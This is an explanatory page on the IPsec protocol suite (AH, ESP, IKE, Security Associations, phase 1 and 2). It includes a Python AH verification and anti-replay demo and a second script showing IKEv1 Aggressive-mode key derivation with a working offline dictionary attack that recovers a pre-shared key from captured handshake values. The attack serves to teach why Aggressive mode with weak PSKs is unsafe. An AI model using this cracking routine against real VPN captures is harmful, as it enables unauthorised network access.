IP security (IPSec)
IP security (IPsec) is an Internet Engineering
Task Force (IETF) standard suite of protocols
that secures traffic between two communicating
points across an IP network, providing data
origin authentication, integrity, and
confidentiality.
It also defines the packet formats that carry
authenticated and encrypted data (the AH and
ESP headers).
The protocols needed for secure key exchange
and key management are defined in it as well.
Uses of IP Security –
IPsec can be used to do the following things:
To encrypt application layer data.
To provide security for routers sending routing
data across the public internet.
To provide authentication without encryption,
for example to verify that the data originates
from a known sender.
To protect network data by setting up IPsec
tunnels in which all data sent between the two
endpoints is encrypted, as with a Virtual
Private Network (VPN) connection.
Components of IP Security –
It has the following components:
Encapsulating Security Payload (ESP) –
It provides confidentiality (encryption), data
integrity, data origin authentication and
anti-replay protection.
Its integrity check covers the ESP header and
the payload but not the outer IP header;
encryption is optional, so ESP can also be used
for authentication only (NULL encryption).
Authentication Header (AH) –
It also provides data integrity, authentication
and anti-replay protection, but it does not
provide encryption.
Its integrity check covers the payload, the AH
header and the immutable fields of the IP
header, which is why AH breaks when a NAT
rewrites addresses on the path.
The anti-replay protection defends against an
attacker capturing valid packets and
retransmitting them later: each packet carries
a sequence number, and the receiver discards
duplicates and packets that fall outside its
window.
It does not protect the data's confidentiality.
Internet Key Exchange (IKE) –
It is the network security protocol that
authenticates the two peers, dynamically
exchanges keying material and negotiates
Security Associations (SAs) between 2 devices.
A Security Association (SA) establishes the
shared security attributes (algorithms, keys,
SPI and lifetime) between 2 network entities
to support secure communication.
IKE is built on the Internet Security Association
and Key Management Protocol (ISAKMP), which
provides a framework for authentication and key
exchange.
ISAKMP defines how Security Associations (SAs)
are set up and how two hosts that use IPsec
establish a direct secure connection.
IKE provides message content protection and an
open framework for negotiating standard
algorithms such as SHA and MD5 for integrity.
These hash algorithms, used in an HMAC with the
negotiated key, produce an integrity check value
for each packet.
This value lets the receiving device determine
whether a packet has been altered in transit.
Packets that fail the check are discarded and
are not passed to the receiver.
MD5 must not be negotiated today and SHA-1 is
being phased out; HMAC-SHA-256 is the current
baseline.
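The AH receive-side processing described above, as an added example written for this page (not code from the original article or from any IPsec implementation): it builds an AH-protected IPv4 packet, then processes it on the receiving side, verifying an HMAC-SHA-256-128 integrity check value with the mutable IP header fields zeroed and enforcing a 64-packet anti-replay window. The key, addresses, SPI, window size and sample packets are constructed for the demo; header layouts follow RFC 4302.

```python
"""
Receive-side AH processing: parse the header, verify the ICV, enforce the
anti-replay window. Added illustration, not code from the page. Integrity
algorithm (HMAC-SHA-256-128), key, SPI, window and packets are assumed.
"""
import hashlib
import hmac
import struct

AH_PROTO = 51       # IP protocol number of AH
ICV_LEN = 16        # HMAC-SHA-256-128 truncates the tag to 128 bits (RFC 4868)
AH_FIXED_LEN = 12   # next hdr(1) + payload len(1) + reserved(2) + SPI(4) + seq(4)


def ipv4_header(src, dst, total_len, ttl=64, ident=0x1234, proto=AH_PROTO):
    """Minimal IPv4 header without options; checksum left zero for brevity."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, 0, ttl, proto, 0, src, dst)


def zero_mutable_ipv4(hdr):
    """AH covers the IP header with fields that legitimately change in transit
    zeroed: DSCP/ECN, flags+fragment offset, TTL and header checksum."""
    h = bytearray(hdr)
    h[1] = 0; h[6:8] = b"\x00\x00"; h[8] = 0; h[10:12] = b"\x00\x00"
    return bytes(h)


def ah_icv(key, ip_hdr, ah_no_icv, payload):
    """ICV over zeroed IP header + AH header (ICV field as zeros) + payload."""
    data = zero_mutable_ipv4(ip_hdr) + ah_no_icv + b"\x00" * ICV_LEN + payload
    return hmac.new(key, data, hashlib.sha256).digest()[:ICV_LEN]


def build_ah_packet(key, src, dst, spi, seq, next_hdr, payload):
    """Sender side: IPv4 header, AH header, ICV, then the protected payload."""
    payload_len_field = (AH_FIXED_LEN + ICV_LEN) // 4 - 2   # 32-bit words minus 2
    ah_no_icv = struct.pack("!BBHII", next_hdr, payload_len_field, 0, spi, seq)
    ip = ipv4_header(src, dst, 20 + AH_FIXED_LEN + ICV_LEN + len(payload))
    return ip + ah_no_icv + ah_icv(key, ip, ah_no_icv, payload) + payload


class InboundSA:
    """One inbound SA: SPI, key and anti-replay state (RFC 4303 Appendix A style)."""
    def __init__(self, spi, key, window=64):
        self.spi, self.key, self.window = spi, key, window
        self.top = 0        # highest sequence number accepted so far
        self.bitmap = 0     # bit i set -> sequence number (top - i) already accepted

    def is_fresh(self, seq):
        if seq == 0:                    # sequence numbers start at 1
            return False
        if seq > self.top:              # right of the window: new
            return True
        diff = self.top - seq
        if diff >= self.window:         # left of the window: too old
            return False
        return not (self.bitmap >> diff) & 1

    def mark(self, seq):
        if seq > self.top:              # slide the window to the right
            self.bitmap = ((self.bitmap << (seq - self.top)) | 1) & ((1 << self.window) - 1)
            self.top = seq
        else:
            self.bitmap |= 1 << (self.top - seq)


def receive(sa, packet):
    """Return (accepted, reason, payload). The window is advanced only after the
    ICV verifies, so forged packets cannot push it past legitimate ones."""
    ip, rest = packet[:20], packet[20:]
    if ip[9] != AH_PROTO:
        return False, "not AH", None
    next_hdr, plen, _, spi, seq = struct.unpack("!BBHII", rest[:AH_FIXED_LEN])
    if spi != sa.spi:
        return False, "unknown SPI", None
    ah_total = (plen + 2) * 4
    ah_no_icv, icv, payload = rest[:AH_FIXED_LEN], rest[AH_FIXED_LEN:ah_total], rest[ah_total:]
    if not sa.is_fresh(seq):
        return False, "replay or outside window", None
    if not hmac.compare_digest(icv, ah_icv(sa.key, ip, ah_no_icv, payload)):
        return False, "ICV mismatch", None
    sa.mark(seq)
    return True, "ok", payload


def demo():
    """Constructed traffic on one SA; returns the receiver's verdict per packet."""
    key = bytes(range(32))
    sa = InboundSA(spi=0x1000, key=key)
    src, dst = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])
    mk = lambda seq, data: build_ah_packet(key, src, dst, 0x1000, seq, 17, data)
    tampered = bytearray(mk(6, b"payload")); tampered[-1] ^= 1   # attacker flips a bit
    routed = bytearray(mk(7, b"routed")); routed[8] = 60         # TTL decremented in transit
    return [receive(sa, p)[1] for p in (
        mk(1, b"a"), mk(1, b"a"), mk(5, b"b"), mk(3, b"c"),
        bytes(tampered), mk(6, b"payload"), bytes(routed), mk(100, b"d"), mk(36, b"e"))]
```

demo() walks one SA through the cases a practitioner cares about: a replayed packet is rejected, a late but unseen packet inside the window is accepted, a tampered packet fails the ICV without moving the window (so the genuine packet with the same sequence number is still accepted afterwards), a packet whose TTL was decremented by a router still verifies, and a packet that has fallen off the left edge of the window is dropped.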
Working of IP Security –
The host checks whether an outgoing packet
should be protected with IPsec or not.
This is decided by matching the packet's traffic
against the security policy, and the policy tells
the sending system which protection to apply.
Incoming packets are also checked by the host
against the policy to verify that they arrived
with the protection the policy requires.
Then IKE Phase 1 starts, in which the 2 hosts
(using IPsec) authenticate themselves to each
other to set up a secure channel.
In IKEv1 it has 2 modes.
Main mode provides greater security because the
identities and authentication hashes are sent
encrypted; Aggressive mode lets the hosts
establish an IPsec circuit more quickly with
fewer messages but sends those values in the
clear.
With a pre-shared key, Aggressive mode therefore
exposes the responder's authentication hash to
offline dictionary attacks, so Main mode (or
IKEv2) is preferred.
The channel created in the last step is then
used to securely negotiate how the IP circuit
will encrypt data across the IP circuit.
Now IKE Phase 2 is conducted over the secure
channel, in which the two hosts negotiate the
cryptographic algorithms to use for the session
and agree on the secret keying material to be
used with those algorithms; the result is the
pair of IPsec SAs.
Then the data is exchanged across the newly
created IPsec tunnel.
These packets are encrypted and decrypted by
the hosts using the IPsec SAs.
When the communication between the hosts is
completed or the session times out, the IPsec
tunnel is terminated and both hosts discard
the keys.
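The Phase 1 exchange and the Aggressive mode caveat above, as an added example written for this page (not code from the original article or from any IKE implementation). It computes the IKEv1 pre-shared-key derivations of RFC 2409 section 5 with a toy-sized Diffie-Hellman group and an assumed HMAC-SHA-256 prf, checks that both peers arrive at the same SKEYID_d/a/e, and then shows a passive eavesdropper recovering the PSK from the captured HASH_R by trying a wordlist. Every exponent, nonce, cookie, payload body, identity, the PSK and the wordlist are constructed for the demo.

```python
"""
IKEv1 phase 1 keying (Aggressive mode, pre-shared key) and the offline
dictionary attack it allows. Added illustration, not code from the page.
prf (HMAC-SHA-256), DH group and all sample values are assumed. RFC 2409 s.5:
  SKEYID   = prf(PSK, Ni | Nr)
  SKEYID_d = prf(SKEYID, g^xy | CKY-I | CKY-R | 0)             -> phase 2 keying
  SKEYID_a = prf(SKEYID, SKEYID_d | g^xy | CKY-I | CKY-R | 1)  -> phase 1 integrity
  SKEYID_e = prf(SKEYID, SKEYID_a | g^xy | CKY-I | CKY-R | 2)  -> phase 1 encryption
  HASH_R   = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
"""
import hashlib
import hmac

# Toy-sized group so the example runs instantly: 2^127 - 1 is prime, but real
# IKE must use 2048-bit or larger MODP groups (RFC 3526) or elliptic curves.
P = 2**127 - 1
G = 2
GLEN = (P.bit_length() + 7) // 8


def prf(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()


def i2b(n):
    return n.to_bytes(GLEN, "big")


def phase1_keys(psk, ni, nr, gxy, cky_i, cky_r):
    """SKEYID and the three keys derived from it (pre-shared key authentication)."""
    skeyid = prf(psk, ni + nr)
    skeyid_d = prf(skeyid, gxy + cky_i + cky_r + b"\x00")
    skeyid_a = prf(skeyid, skeyid_d + gxy + cky_i + cky_r + b"\x01")
    skeyid_e = prf(skeyid, skeyid_a + gxy + cky_i + cky_r + b"\x02")
    return {"SKEYID": skeyid, "SKEYID_d": skeyid_d, "SKEYID_a": skeyid_a, "SKEYID_e": skeyid_e}


def hash_r(skeyid, gxr, gxi, cky_r, cky_i, sai_b, idir_b):
    return prf(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b)


def aggressive_mode(psk, xi, xr, ni, nr, cky_i, cky_r, sai_b, idir_b):
    """Cryptographic core of the Aggressive mode exchange:
    msg 1 (I->R): SA, g^xi, Ni, IDii    msg 2 (R->I): SA, g^xr, Nr, IDir, HASH_R
    Messages 1 and 2 travel in clear. Returns both peers' keys and what an
    eavesdropper on the path captures."""
    gxi, gxr = pow(G, xi, P), pow(G, xr, P)
    gxy_i = i2b(pow(gxr, xi, P))     # each side combines its own exponent
    gxy_r = i2b(pow(gxi, xr, P))     # with the peer's public value
    keys_i = phase1_keys(psk, ni, nr, gxy_i, cky_i, cky_r)
    keys_r = phase1_keys(psk, ni, nr, gxy_r, cky_i, cky_r)
    captured = {"gxi": i2b(gxi), "gxr": i2b(gxr), "ni": ni, "nr": nr,
                "cky_i": cky_i, "cky_r": cky_r, "sai_b": sai_b, "idir_b": idir_b}
    captured["hash_r"] = hash_r(keys_r["SKEYID"], captured["gxr"], captured["gxi"],
                                cky_r, cky_i, sai_b, idir_b)
    return keys_i, keys_r, captured


def crack_psk(captured, wordlist):
    """Offline attack: every input to HASH_R except the PSK was sent in clear and
    SKEYID in PSK mode does not involve the DH secret, so each guess costs two
    HMACs. Main mode sends HASH_R encrypted under SKEYID_e, which blocks this."""
    for guess in wordlist:
        sk = prf(guess, captured["ni"] + captured["nr"])
        h = hash_r(sk, captured["gxr"], captured["gxi"], captured["cky_r"],
                   captured["cky_i"], captured["sai_b"], captured["idir_b"])
        if hmac.compare_digest(h, captured["hash_r"]):
            return guess
    return None


def demo():
    """Deterministic run on constructed values. Returns (peers agree on keys,
    PSK recovered from a wordlist containing it, result for a wordlist without it)."""
    psk = b"summer2019"
    keys_i, keys_r, captured = aggressive_mode(
        psk, xi=0x1F3A5C7E9B2D4F60A1B2, xr=0x0A1B2C3D4E5F60718293,
        ni=bytes.fromhex("00112233445566778899aabbccddeeff"),
        nr=bytes.fromhex("ffeeddccbbaa99887766554433221100"),
        cky_i=bytes.fromhex("0102030405060708"), cky_r=bytes.fromhex("1112131415161718"),
        sai_b=b"\x00\x00\x00\x01\x00\x00\x00\x01" + b"\x00" * 8,   # placeholder SA payload body
        idir_b=b"\x01\x00\x00\x00" + bytes([10, 0, 0, 2]))          # ID_IPV4_ADDR 10.0.0.2
    return (keys_i == keys_r,
            crack_psk(captured, [b"password", b"vpn123", b"summer2019", b"letmein"]),
            crack_psk(captured, [b"password", b"letmein"]))


if __name__ == "__main__":
    print(demo())
```

This is the attack that tools such as ike-scan's psk-crack automate against real captures; the defence is to avoid Aggressive mode with pre-shared keys (use Main mode, certificates, or IKEv2) and, where a PSK must remain, to make it long and random so the wordlist never contains it.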
